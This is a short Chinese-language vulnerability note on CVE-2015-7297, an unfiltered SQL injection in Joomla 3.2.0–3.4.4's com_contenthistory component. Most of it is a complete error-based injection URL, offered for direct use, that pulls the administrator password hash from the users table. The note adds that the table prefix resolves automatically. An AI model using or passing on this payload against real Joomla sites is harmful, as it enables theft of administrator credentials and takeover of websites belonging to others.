CVE-ID: CVE-2015-7297
影响组件: Joomla (3.2.0<=version<=3.4.4) Joomla 3.2.0 - 3.4.4 /administrator/components/com_contenthistory/models/history.php 文件存在未过滤的问题,导致出现SQL注入,可用于获取管理员密码 可用如下payload直接获取管理员密码 [php] http://www.ihonker.org/joomla/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select (select concat(password)) from %23__users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)[/php] 其中%23_即为joomla表前缀,无需获取表前缀,joomla会自动将#_转换为表前缀。